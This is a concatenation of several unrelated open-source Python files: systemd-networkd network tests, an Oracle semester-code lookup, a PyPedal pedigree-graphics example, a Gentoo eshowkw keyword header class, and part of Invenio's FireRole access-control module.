'dhcp-client-with-ipv4ll-fallback-without-dhcp-server.network')
start_networkd()
self.wait_online(['veth99:degraded', 'veth-peer:routable'])
output = check_output('ip address show dev veth99')
print(output)
output = check_output('ip -6 address show dev veth99 scope global dynamic')
self.assertNotRegex(output, 'inet6 2600::[0-9a-f]*/128 scope global dynamic')
output = check_output('ip -6 address show dev veth99 scope link')
self.assertRegex(output, 'inet6 .* scope link')
output = check_output('ip -4 address show dev veth99 scope global dynamic')
self.assertNotRegex(output, 'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
output = check_output('ip -4 address show dev veth99 scope link')
self.assertRegex(output, 'inet .* scope link')
def test_dhcp_client_route_remove_on_renew(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network',
'dhcp-client-ipv4-only-ipv6-disabled.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq(ipv4_range='192.168.5.100,192.168.5.199', lease_time='2m')
self.wait_online(['veth99:routable', 'veth-peer:routable'])
# test for issue #12490
output = check_output('ip -4 address show dev veth99 scope global dynamic')
print(output)
self.assertRegex(output, 'inet 192.168.5.1[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
address1=None
for line in output.splitlines():
if 'brd 192.168.5.255 scope global dynamic veth99' in line:
address1 = line.split()[1].split('/')[0]
break
output = check_output('ip -4 route show dev veth99')
print(output)
self.assertRegex(output, f'default via 192.168.5.1 proto dhcp src {address1} metric 1024')
self.assertRegex(output, f'192.168.5.1 proto dhcp scope link src {address1} metric 1024')
stop_dnsmasq(dnsmasq_pid_file)
start_dnsmasq(ipv4_range='192.168.5.200,192.168.5.250', lease_time='2m')
print('Wait for the dynamic address to be expired')
time.sleep(130)
output = check_output('ip -4 address show dev veth99 scope global dynamic')
print(output)
self.assertRegex(output, 'inet 192.168.5.2[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
address2=None
for line in output.splitlines():
if 'brd 192.168.5.255 scope global dynamic veth99' in line:
address2 = line.split()[1].split('/')[0]
break
self.assertNotEqual(address1, address2)
output = check_output('ip -4 route show dev veth99')
print(output)
self.assertNotRegex(output, f'default via 192.168.5.1 proto dhcp src {address1} metric 1024')
self.assertNotRegex(output, f'192.168.5.1 proto dhcp scope link src {address1} metric 1024')
self.assertRegex(output, f'default via 192.168.5.1 proto dhcp src {address2} metric 1024')
self.assertRegex(output, f'192.168.5.1 proto dhcp scope link src {address2} metric 1024')
def test_dhcp_client_use_dns_yes(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-use-dns-yes.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq('--dhcp-option=option:dns-server,192.168.5.1 --dhcp-option=option6:dns-server,[2600::1]')
self.wait_online(['veth99:routable', 'veth-peer:routable'])
# link become 'routable' when at least one protocol provide an valid address.
self.wait_address('veth99', r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic', ipv='-4')
self.wait_address('veth99', r'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)', ipv='-6')
time.sleep(3)
output = check_output(*resolvectl_cmd, 'dns', 'veth99', env=env)
print(output)
self.assertRegex(output, '192.168.5.1')
self.assertRegex(output, '2600::1')
def test_dhcp_client_use_dns_no(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-use-dns-no.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq('--dhcp-option=option:dns-server,192.168.5.1 --dhcp-option=option6:dns-server,[2600::1]')
self.wait_online(['veth99:routable', 'veth-peer:routable'])
# link become 'routable' when at least one protocol provide an valid address.
self.wait_address('veth99', r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic', ipv='-4')
self.wait_address('veth99', r'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)', ipv='-6')
time.sleep(3)
output = check_output(*resolvectl_cmd, 'dns', 'veth99', env=env)
print(output)
self.assertNotRegex(output, '192.168.5.1')
self.assertNotRegex(output, '2600::1')
def test_dhcp_client_use_dns_ipv4(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-use-dns-ipv4.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq('--dhcp-option=option:dns-server,192.168.5.1 --dhcp-option=option6:dns-server,[2600::1]')
self.wait_online(['veth99:routable', 'veth-peer:routable'])
# link become 'routable' when at least one protocol provide an valid address.
self.wait_address('veth99', r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic', ipv='-4')
self.wait_address('veth99', r'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)', ipv='-6')
time.sleep(3)
output = check_output(*resolvectl_cmd, 'dns', 'veth99', env=env)
print(output)
self.assertRegex(output, '192.168.5.1')
self.assertNotRegex(output, '2600::1')
def test_dhcp_client_use_dns_ipv4_and_ra(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-use-dns-ipv4-and-ra.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq('--dhcp-option=option:dns-server,192.168.5.1 --dhcp-option=option6:dns-server,[2600::1]')
self.wait_online(['veth99:routable', 'veth-peer:routable'])
# link become 'routable' when at least one protocol provide an valid address.
self.wait_address('veth99', r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic', ipv='-4')
self.wait_address('veth99', r'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)', ipv='-6')
time.sleep(3)
output = check_output(*resolvectl_cmd, 'dns', 'veth99', env=env)
print(output)
self.assertRegex(output, '192.168.5.1')
self.assertRegex(output, '2600::1')
def test_dhcp_client_use_domains(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-use-domains.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq('--dhcp-option=option:domain-search,example.com')
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
print(output)
self.assertRegex(output, 'Search Domains: example.com')
time.sleep(3)
output = check_output(*resolvectl_cmd, 'domain', 'veth99', env=env)
print(output)
self.assertRegex(output, 'example.com')
def test_dhcp_client_decline(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-decline.network', 'dhcp-client-decline.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
rc = call(*wait_online_cmd, '--timeout=10s', '--interface=veth99:routable', env=env)
self.assertTrue(rc == 1)
class NetworkdIPv6PrefixTests(unittest.TestCase, Utilities):
links = ['veth99']
units = [
'25-veth.netdev',
'ipv6ra-prefix-client.network',
'ipv6ra-prefix.network'
]
def setUp(self):
remove_links(self.links)
stop_networkd(show_logs=False)
def tearDown(self):
remove_log_file()
remove_links(self.links)
remove_unit_from_networkd_path(self.units)
stop_networkd(show_logs=True)
def test_ipv6_route_prefix(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'ipv6ra-prefix-client.network', 'ipv6ra-prefix.network')
start_networkd()
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output('ip', '-6', 'route', 'show', 'dev', 'veth-peer')
print(output)
self.assertRegex(output, '2001:db8:0:1::/64 proto ra')
class NetworkdMTUTests(unittest.TestCase, Utilities):
links = ['dummy98']
units = [
'12-dummy.netdev',
'12-dummy-mtu.netdev',
'12-dummy-mtu.link',
'12-dummy.network',
]
def setUp(self):
remove_links(self.links)
stop_networkd(show_logs=False)
def tearDown(self):
remove_log_file()
remove_links(self.links)
remove_unit_from_networkd_path(self.units)
stop_networkd(show_logs=True)
def check_mtu(self, mtu, ipv6_mtu=None, reset=True):
if not ipv6_mtu:
ipv6_mtu = mtu
# test normal start
start_networkd()
self.wait_online(['dummy98:routable'])
self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'mtu'), ipv6_mtu)
self.assertEqual(read_link_attr('dummy98', 'mtu'), mtu)
# test normal restart
restart_networkd()
self.wait_online(['dummy98:routable'])
self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'mtu'), ipv6_mtu)
self.assertEqual(read_link_attr('dummy98', 'mtu'), mtu)
if reset:
self.reset_check_mtu(mtu, ipv6_mtu)
def reset_check_mtu(self, mtu, ipv6_mtu=None):
''' test setting mtu/ipv6_mtu with interface already up '''
stop_networkd()
# note - changing the device mtu resets the ipv6 mtu
run('ip link set up mtu 1501 dev dummy98')
run('ip link set up mtu 1500 dev dummy98')
self.assertEqual(read_link_attr('dummy98', 'mtu'), '1500')
self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'mtu'), '1500')
self.check_mtu(mtu, ipv6_mtu, reset=False)
def test_mtu_network(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', '12-dummy.network.d/mtu.conf')
self.check_mtu('1600')
def test_mtu_netdev(self):
copy_unit_to_networkd_unit_path('12-dummy-mtu.netdev', '12-dummy.network', dropins=False)
# note - MTU set by .netdev happens ONLY at device creation!
self.check_mtu('1600', reset=False)
def test_mtu_link(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', '12-dummy-mtu.link', '12-dummy.network', dropins=False)
# must reload udev because it only picks up new files after 3 second delay
call('udevadm control --reload')
# note - MTU set by .link happens ONLY at udev processing of device 'add' uevent!
self.check_mtu('1600', reset=False)
def test_ipv6_mtu(self):
''' set ipv6 mtu without setting device mtu '''
copy_unit_to_networkd_unit_path('12-dummy.netdev', '12-dummy.network.d/ipv6-mtu-1400.conf')
self.check_mtu('1500', '1400')
def test_ipv6_mtu_toolarge(self):
''' try set ipv6 mtu over device mtu (it shouldn't work) '''
copy_unit_to_networkd_unit_path('12-dummy.netdev', '12-dummy.network.d/ipv6-mtu-1550.conf')
self.check_mtu('1500', '1500')
def test_mtu_network_ipv6_mtu(self):
''' set ipv6 mtu and set device mtu via network file '''
copy_unit_to_networkd_unit_path('12-dummy.netdev', '12-dummy.network.d/mtu.conf', '12-dummy.network.d/ipv6-mtu-1550.conf')
self.check_mtu('1600', '1550')
def test_mtu_netdev_ipv6_mtu(self):
''' set ipv6 mtu and set device mtu via netdev file '''
copy_unit_to_networkd_unit_path('12-dummy-mtu.netdev', '12-dummy.network.d/ipv6-mtu-1550.conf')
self.check_mtu('1600', '1550', reset=False)
def test_mtu_link_ipv6_mtu(self):
''' set ipv6 mtu and set device mtu via link file '''
copy_unit_to_networkd_unit_path('12-dummy.netdev', '12-dummy-mtu.link', '12-dummy.network.d/ipv6-mtu-1550.conf')
# must reload udev because it only picks up new files after 3 second delay
call('udevadm control --reload')
self.check_mtu('1600', '1550', reset=False)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--build-dir', help='Path to build dir', dest='build_dir')
parser.add_argument('--networkd', help='Path to systemd-networkd', dest='networkd_bin')
parser.add_argument('--resolved', help='Path to systemd-resolved', dest='resolved_bin')
parser.add_argument('--wait-online', help='Path to systemd-networkd-wait-online', dest='wait_online_bin')
parser.add_argument('--networkctl', help='Path to networkctl', dest='networkctl_bin')
parser.add_argument('--resolvectl', help='Path to resolvectl', dest='resolvectl_bin')
parser.add_argument('--timedatectl', help='Path to timedatectl', dest='timedatectl_bin')
parser.add_argument('--valgrind', help='Enable valgrind', dest='use_valgrind', type=bool, nargs='?', const=True, default=use_valgrind)
parser.add_argument('--debug', help='Generate debugging logs', dest='enable_debug', type=bool, nargs='?', const=True, default=enable_debug)
parser.add_argument('--asan-options', help='ASAN options', dest='asan_options')
parser.add_argument('--lsan-options', help='LSAN options', dest='lsan_options')
parser.add_argument('--ubsan-options', help='UBSAN options', dest='ubsan_options')
ns, args = parser.parse_known_args(namespace=unittest)
if ns.build_dir:
if ns.networkd_bin or ns.resolved_bin or ns.wait_online_bin or ns.networkctl_bin or ns.resolvectl_bin or ns.timedatectl_bin:
print('WARNING: --networkd, --resolved, --wait-online, --networkctl, --resolvectl, or --timedatectl options are ignored when --build-dir is specified.')
networkd_bin = os.path.join(ns.build_dir, 'systemd-networkd')
resolved_bin = os.path.join(ns.build_dir, 'systemd-resolved')
wait_online_bin = os.path.join(ns.build_dir, 'systemd-networkd-wait-online')
networkctl_bin = os.path.join(ns.build_dir, 'networkctl')
resolvectl_bin = os.path.join(ns.build_dir, 'resolvectl')
timedatectl_bin = os.path.join(ns.build_dir, 'timedatectl')
else:
if ns.networkd_bin:
networkd_bin = ns.networkd_bin
if ns.resolved_bin:
resolved_bin = ns.resolved_bin
if ns.wait_online_bin:
wait_online_bin = ns.wait_online_bin
if ns.networkctl_bin:
networkctl_bin = ns.networkctl_bin
if ns.resolvectl_bin:
resolvectl_bin = ns.resolvectl_bin
if ns.timedatectl_bin:
timedatectl_bin = ns.timedatectl_bin
use_valgrind = ns.use_valgrind
enable_debug = ns.enable_debug
asan_options = ns.asan_options
lsan_options = ns.lsan_options
ubsan_options = ns.ubsan_options
if use_valgrind:
networkctl_cmd = ['valgrind', '--track-origins=yes', '--leak-check=full', '--show-leak-kinds=all', networkctl_bin]
resolvectl_cmd = ['valgrind', '--track-origins=yes', '--leak-check=full', '--show-leak-kinds=all', resolvectl_bin]
timedatectl_cmd = ['valgrind', '--track-origins=yes', '--leak-check=full', '--show-leak-kinds=all', timedatectl_bin]
wait_online_cmd = ['valgrind', '--track-origins=yes', '--leak-check=full', '--show-leak-kinds=all', wait_online_bin]
else:
networkctl_cmd = [networkctl_bin]
resolvectl_cmd = [resolvectl_bin]
timedatectl_cmd = [timedatectl_bin]
wait_online_cmd = [wait_online_bin]
if enable_debug:
env.update({ 'SYSTEMD_LOG_LEVEL' : 'debug' })
if asan_options:
env.update({ 'ASAN_OPTIONS' : asan_options })
if lsan_options:
env.update({ 'LSAN_OPTIONS' : lsan_options })
if ubsan_options:
env.update({ 'UBSAN_OPTIONS' : ubsan_options })
sys.argv[1:] = args
unittest.main(testRunner=unittest.TextTestRunner(stream=sys.stdout,
verbosity=3))
| dsd/systemd | test/test-network/systemd-networkd-tests.py | Python | gpl-2.0 | 156,648 |
# returns the current PeopleSoft semester code, as of today
# if today is between semesters, returns the next semester code
import cx_Oracle
def getCurrentOrNextSemesterCX (self):
file = open('/opt/Plone-2.5.5/zeocluster/client1/Extensions/Oracle_Database_Connection_NGUYEN_PRD.txt', 'r')
for line in file.readlines():
if line <> "" and not line.startswith('#'):
connString = line
file.close()
connection = cx_Oracle.connect(connString)
cursor = connection.cursor()
# get the current semester code if we are within a semester
cursor.execute("""select strm from ps_term_tbl where institution = 'UWOSH' and acad_career = 'UGRD' and term_begin_dt <= sysdate and term_end_dt >= sysdate""")
for column_1 in cursor:
try:
return column_1[0]
except:
pass
# otherwise get the next semester code
cursor.execute("""select t1.strm, t1.descr from ps_term_tbl t1 where t1.institution = 'UWOSH' and t1.acad_career = 'UGRD' and t1.term_begin_dt = (select min(term_begin_dt) from ps_term_tbl t2 where t2.institution = t1.institution and t2.acad_career = t1.acad_career and term_begin_dt > sysdate)""")
for column_1 in cursor:
try:
return column_1[0]
except:
pass
| uwosh/Campus_Directory_web_service | getCurrentOrNextSemesterCX.py | Python | gpl-2.0 | 1,292 |
#!/usr/bin/python
###############################################################################
# NAME: new_graphics3.py
# VERSION: 2.0.0b15 (18SEPTEMBER2006)
# AUTHOR: John B. Cole, PhD (jcole@aipl.arsusda.gov)
# LICENSE: LGPL
###############################################################################
from PyPedal import pyp_demog
from PyPedal import pyp_graphics
from PyPedal import pyp_jbc
from PyPedal import pyp_newclasses
from PyPedal import pyp_nrm
from PyPedal import pyp_metrics
from PyPedal.pyp_utils import pyp_nice_time
if __name__ == '__main__':
print 'Starting pypedal.py at %s' % (pyp_nice_time())
example = pyp_newclasses.loadPedigree(optionsfile='new_graphics3.ini')
if example.kw['messages'] == 'verbose':
print '[INFO]: Calling pyp_graphics.new_draw_pedigree() at %s' % (pyp_nice_time())
pyp_graphics.new_draw_pedigree(example, gfilename='graphics3', gtitle='graphics3 pedigree', gorient='p')
pyp_jbc.color_pedigree(example,gfilename='graphics3', ghatch='0', \
metric='sons', gtitle='Nodes are colored by number of sons.', \
gprog='dot', gname=1) | wintermind/pypedal | PyPedal/examples/new_graphics3.py | Python | gpl-2.0 | 1,123 |
# vim:fileencoding=utf-8
# Copyright 2001-2010 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
__all__ = ['keywords_header']
from portage import settings as ports
from portage.output import colorize
from display_pretty import colorize_string
from display_pretty import align_string
class keywords_header:
__IMPARCHS = [ 'arm', 'amd64', 'x86' ]
__ADDITIONAL_FIELDS = [ 'unused', 'slot' ]
__EXTRA_FIELDS = [ 'repo' ]
def __readKeywords(self):
"""Read all available keywords from portage."""
return [x for x in ports.archlist()
if not x.startswith('~')]
def __sortKeywords(self, keywords, prefix = False, required_keywords = []):
"""Sort keywords with short archs first"""
# user specified only some keywords to display
if len(required_keywords) != 0:
tmpkeywords = [k for k in keywords
if k in required_keywords]
# idiots might specify non-existant archs
if len(tmpkeywords) != 0:
keywords = tmpkeywords
normal = [k for k in keywords
if len(k.split('-')) == 1]
normal.sort()
if prefix:
longer = [k for k in keywords
if len(k.split('-')) != 1]
longer.sort()
normal.extend(longer)
return normal
def __readAdditionalFields(self):
"""Prepare list of aditional fileds displayed by eshowkw (2nd part)"""
return self.__ADDITIONAL_FIELDS
def __readExtraFields(self):
"""Prepare list of extra fileds displayed by eshowkw (3rd part)"""
return self.__EXTRA_FIELDS
def __formatKeywords(self, keywords, align, length):
"""Append colors and align keywords properly"""
tmp = []
for keyword in keywords:
tmp2 = keyword
keyword = align_string(keyword, align, length)
# % are used as separators for further split so we wont loose spaces and coloring
keyword = '%'.join(list(keyword))
if tmp2 in self.__IMPARCHS:
tmp.append(colorize_string('darkyellow', keyword))
else:
tmp.append(keyword)
return tmp
def __formatAdditional(self, additional, align, length):
"""Align additional items properly"""
# % are used as separators for further split so we wont loose spaces and coloring
return ['%'.join(align_string(x, align, length)) for x in additional]
def __prepareExtra(self, extra, align, length):
content = []
content.append(''.ljust(length, '-'))
content.extend(self.__formatAdditional(extra, align, length))
return content
def __prepareResult(self, keywords, additional, align, length):
"""Parse keywords and additional fields into one list with proper separators"""
content = []
content.append(''.ljust(length, '-'))
content.extend(self.__formatKeywords(keywords, align, length))
content.append(''.ljust(length, '-'))
content.extend(self.__formatAdditional(additional, align, length))
return content
def __init__(self, prefix = False, required_keywords = [], keywords_align = 'bottom'):
"""Initialize keywords header."""
additional = self.__readAdditionalFields()
extra = self.__readExtraFields()
self.keywords = self.__sortKeywords(self.__readKeywords(), prefix, required_keywords)
self.length = max(
max([len(x) for x in self.keywords]),
max([len(x) for x in additional]),
max([len(x) for x in extra])
)
#len(max([max(self.keywords, key=len), max(additional, key=len)], key=len))
self.keywords_count = len(self.keywords)
self.additional_count = len(additional)
self.extra_count = len(extra)
self.content = self.__prepareResult(self.keywords, additional, keywords_align, self.length)
self.extra = self.__prepareExtra(extra, keywords_align, self.length)
| djanderson/equery | pym/gentoolkit/eshowkw/keywords_header.py | Python | gpl-2.0 | 3,555 |
## This file is part of Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Invenio Access Control FireRole."""
__revision__ = "$Id$"
__lastupdated__ = """$Date$"""
"""These functions are for realizing a firewall like role definition for extending
webaccess to connect user to roles using every infos about users.
"""
import re
import cPickle
from zlib import compress, decompress
import sys
import time
if sys.hexversion < 0x2040000:
# pylint: disable=W0622
from sets import Set as set
# pylint: enable=W0622
from invenio.access_control_config import InvenioWebAccessFireroleError
from invenio.dbquery import run_sql, blob_to_string
from invenio.config import CFG_CERN_SITE
from invenio.access_control_config import CFG_ACC_EMPTY_ROLE_DEFINITION_SRC, \
CFG_ACC_EMPTY_ROLE_DEFINITION_SER, CFG_ACC_EMPTY_ROLE_DEFINITION_OBJ
# INTERFACE
def compile_role_definition(firerole_def_src):
""" Given a text in which every row contains a rule it returns the compiled
object definition.
Rules have the following syntax:
allow|deny [not] field {list of one or more (double)quoted string or regexp}
or allow|deny any
Every row may contain a # sign followed by a comment which are discarded.
Field could be any key contained in a user_info dictionary. If the key does
not exist in the dictionary, the rule is skipped.
The first rule which matches return.
"""
line = 0
ret = []
default_allow_p = False
if not firerole_def_src or not firerole_def_src.strip():
firerole_def_src = CFG_ACC_EMPTY_ROLE_DEFINITION_SRC
for row in firerole_def_src.split('\n'):
line += 1
row = row.strip()
if not row:
continue
clean_row = _no_comment_re.sub('', row)
if clean_row:
g = _any_rule_re.match(clean_row)
if g:
default_allow_p = g.group('command').lower() == 'allow'
break
g = _rule_re.match(clean_row)
if g:
allow_p = g.group('command').lower() == 'allow'
not_p = g.group('not') != None
field = g.group('field').lower()
# Renaming groups to group
for alias_item in _aliasTable:
if field in alias_item:
field = alias_item[0]
break
if field.startswith('precached_'):
raise InvenioWebAccessFireroleError("Error while compiling rule %s (line %s): %s is a reserved key and can not be used in FireRole rules!" % (row, line, field))
expressions = g.group('expression')+g.group('more_expressions')
expressions_list = []
for expr in _expressions_re.finditer(expressions):
expr = expr.group()
if field in ('from', 'until'):
try:
expressions_list.append((False, time.mktime(time.strptime(expr[1:-1], '%Y-%m-%d'))))
except Exception, msg:
raise InvenioWebAccessFireroleError("Syntax error while compiling rule %s (line %s): %s is not a valid date with format YYYY-MM-DD because %s!" % (row, line, expr, msg))
elif expr[0] == '/':
try:
expressions_list.append((True, re.compile(expr[1:-1], re.I)))
except Exception, msg:
raise InvenioWebAccessFireroleError("Syntax error while compiling rule %s (line %s): %s is not a valid re because %s!" % (row, line, expr, msg))
else:
if field == 'remote_ip' and '/' in expr[1:-1]:
try:
expressions_list.append((False, _ip_matcher_builder(expr[1:-1])))
except Exception, msg:
raise InvenioWebAccessFireroleError("Syntax error while compiling rule %s (line %s): %s is not a valid ip group because %s!" % (row, line, expr, msg))
else:
expressions_list.append((False, expr[1:-1]))
expressions_list = tuple(expressions_list)
if field in ('from', 'until'):
if len(expressions_list) != 1:
raise InvenioWebAccessFireroleError("Error when compiling rule %s (line %s): exactly one date is expected when using 'from' or 'until', but %s were found" % (row, line, len(expressions_list)))
if not_p:
raise InvenioWebAccessFireroleError("Error when compiling rule %s (line %s): 'not' is not allowed when using 'from' or 'until'" % (row, line))
ret.append((allow_p, not_p, field, expressions_list))
else:
raise InvenioWebAccessFireroleError("Syntax error while compiling rule %s (line %s): not a valid rule!" % (row, line))
return (default_allow_p, tuple(ret))
def repair_role_definitions():
""" Try to rebuild compiled serialized definitions from their respectives
sources. This is needed in case Python break back compatibility.
"""
definitions = run_sql("SELECT id, firerole_def_src FROM accROLE")
for role_id, firerole_def_src in definitions:
run_sql("UPDATE accROLE SET firerole_def_ser=%s WHERE id=%s", (serialize(compile_role_definition(firerole_def_src)), role_id))
def store_role_definition(role_id, firerole_def_ser, firerole_def_src):
""" Store a compiled serialized definition and its source in the database
alongside the role to which it belong.
@param role_id: the role_id
@param firerole_def_ser: the serialized compiled definition
@param firerole_def_src: the sources from which the definition was taken
"""
run_sql("UPDATE accROLE SET firerole_def_ser=%s, firerole_def_src=%s WHERE id=%s", (firerole_def_ser, firerole_def_src, role_id))
def load_role_definition(role_id):
""" Load the definition corresponding to a role. If the compiled definition
is corrupted it try to repairs definitions from their sources and try again
to return the definition.
@param role_id:
@return: a deserialized compiled role definition
"""
res = run_sql("SELECT firerole_def_ser FROM accROLE WHERE id=%s", (role_id, ), 1)
if res:
try:
return deserialize(res[0][0])
except Exception:
## Something bad might have happened? (Update of Python?)
repair_role_definitions()
res = run_sql("SELECT firerole_def_ser FROM accROLE WHERE id=%s", (role_id, ), 1)
if res:
return deserialize(res[0][0])
return CFG_ACC_EMPTY_ROLE_DEFINITION_OBJ
def acc_firerole_extract_emails(firerole_def_obj):
"""
Best effort function to extract all the possible email addresses
authorized by the given firerole.
"""
authorized_emails = set()
try:
default_allow_p, rules = firerole_def_obj
for (allow_p, not_p, field, expressions_list) in rules: # for every rule
if not_p:
continue
if field == 'group':
for reg_p, expr in expressions_list:
if reg_p:
continue
if CFG_CERN_SITE and expr.endswith(' [CERN]'):
authorized_emails.add(expr[:len(' [CERN]')].lower().strip() + '@cern.ch')
emails = run_sql("SELECT user.email FROM usergroup JOIN user_usergroup ON usergroup.id=user_usergroup.id_usergroup JOIN user ON user.id=user_usergroup.id_user WHERE usergroup.name=%s", (expr, ))
for email in emails:
authorized_emails.add(email[0].lower().strip())
elif field == 'email':
for reg_p, expr in expressions_list:
if reg_p:
continue
authorized_emails.add(expr.lower().strip())
elif field == 'uid':
for reg_p, expr in expressions_list:
if reg_p:
continue
email = run_sql("SELECT email FROM user WHERE id=%s", (expr, ))
if email:
authorized_emails.add(email[0][0].lower().strip())
return authorized_emails
except Exception, msg:
raise InvenioWebAccessFireroleError, msg
def acc_firerole_check_user(user_info, firerole_def_obj):
""" Given a user_info dictionary, it matches the rules inside the deserializez
compiled definition in order to discover if the current user match the roles
corresponding to this definition.
@param user_info: a dict produced by collect_user_info which contains every
info about a user
@param firerole_def_obj: a compiled deserialized definition produced by
compile_role_defintion
@return: True if the user match the definition, False otherwise.
"""
try:
default_allow_p, rules = firerole_def_obj
for (allow_p, not_p, field, expressions_list) in rules: # for every rule
group_p = field == 'group' # Is it related to group?
ip_p = field == 'remote_ip' # Is it related to Ips?
until_p = field == 'until' # Is it related to dates?
from_p = field == 'from' # Idem.
next_expr_p = False # Silly flag to break 2 for cycles
if not user_info.has_key(field) and not from_p and not until_p:
continue
for reg_p, expr in expressions_list: # For every element in the rule
if group_p: # Special case: groups
if reg_p: # When it is a regexp
for group in user_info[field]: # iterate over every group
if expr.match(group): # if it matches
if not_p: # if must not match
next_expr_p = True # let's skip to next expr
break
else: # Ok!
return allow_p
if next_expr_p:
break # I said: let's skip to next rule ;-)
elif expr.lower() in [group.lower() for group in user_info[field]]: # Simple expression then just check for expr in groups
if not_p: # If expr is in groups then if must not match
break # let's skip to next expr
else: # Ok!
return allow_p
elif reg_p: # Not a group, then easier. If it's a regexp
if expr.match(user_info[field]): # if it matches
if not_p: # If must not match
break # Let's skip to next expr
else:
return allow_p # Ok!
elif ip_p and type(expr) == type(()): # If it's just a simple expression but an IP!
if _ipmatch(user_info['remote_ip'], expr): # Then if Ip matches
if not_p: # If must not match
break # let's skip to next expr
else:
return allow_p # ok!
elif until_p:
if time.time() <= expr:
if allow_p:
break
else:
return False
elif allow_p:
return False
else:
break
elif from_p:
if time.time() >= expr:
if allow_p:
break
else:
return False
elif allow_p:
return False
else:
break
elif expr.lower() == user_info[field].lower(): # Finally the easiest one!!
if not_p: # ...
break
else: # ...
return allow_p # ...
if not_p and not next_expr_p: # Nothing has matched and we got not
return allow_p # Then the whole rule matched!
except Exception, msg:
raise InvenioWebAccessFireroleError, msg
return default_allow_p # By default we allow ;-) it'an OpenAccess project
def serialize(firerole_def_obj):
""" Serialize and compress a definition."""
if firerole_def_obj == CFG_ACC_EMPTY_ROLE_DEFINITION_OBJ:
return CFG_ACC_EMPTY_ROLE_DEFINITION_SER
elif firerole_def_obj:
return compress(cPickle.dumps(firerole_def_obj, -1))
else:
return CFG_ACC_EMPTY_ROLE_DEFINITION_SER
def deserialize(firerole_def_ser):
""" Deserialize and decompress a definition."""
if firerole_def_ser:
return cPickle.loads(decompress(blob_to_string(firerole_def_ser)))
else:
return CFG_ACC_EMPTY_ROLE_DEFINITION_OBJ
# IMPLEMENTATION
# Comment finder
_no_comment_re = re.compile(r'[\s]*(?<!\\)#.*')
# Rule dissecter
_rule_re = re.compile(r'(?P<command>allow|deny)[\s]+(?:(?P<not>not)[\s]+)?(?P<field>[\w]+)[\s]+(?P<expression>(?<!\\)\'.+?(?<!\\)\'|(?<!\\)\".+?(?<!\\)\"|(?<!\\)\/.+?(?<!\\)\/)(?P<more_expressions>([\s]*,[\s]*((?<!\\)\'.+?(?<!\\)\'|(?<!\\)\".+?(?<!\\)\"|(?<!\\)\/.+?(?<!\\)\/))*)(?:[\s]*(?<!\\).*)?', re.I)
_any_rule_re = re.compile(r'(?P<command>allow|deny)[\s]+(any|all)[\s]*', re.I)
# Sub expression finder
_expressions_re = re.compile(r'(?<!\\)\'.+?(?<!\\)\'|(?<!\\)\".+?(?<!\\)\"|(?<!\\)\/.+?(?<!\\)\/')
def _mkip (ip):
""" Compute a numerical value for a dotted IP """
num = 0L
for i in map (int, ip.split ('.')):
num = (num << 8) + i
return num
_full = 2L ** 32 - 1
_aliasTable = (('group', 'groups'), )
def _ip_matcher_builder(group):
""" Compile a string "ip/bitmask" (i.e. 127.0.0.0/24)
@param group: a classical "ip/bitmask" string
@return: a tuple containing the gip and mask in a binary version.
"""
gip, gmk = group.split('/')
gip = _mkip(gip)
gmk = int(gmk)
mask = (_full - (2L ** (32 - gmk) - 1))
if not (gip & mask == gip):
raise InvenioWebAccessFireroleError, "Netmask does not match IP (%Lx %Lx)" % (gip, mask)
return (gip, mask)
def _ipmatch(ip, ip_matcher):
""" Check if an ip matches an ip_group.
@param ip: the ip to check
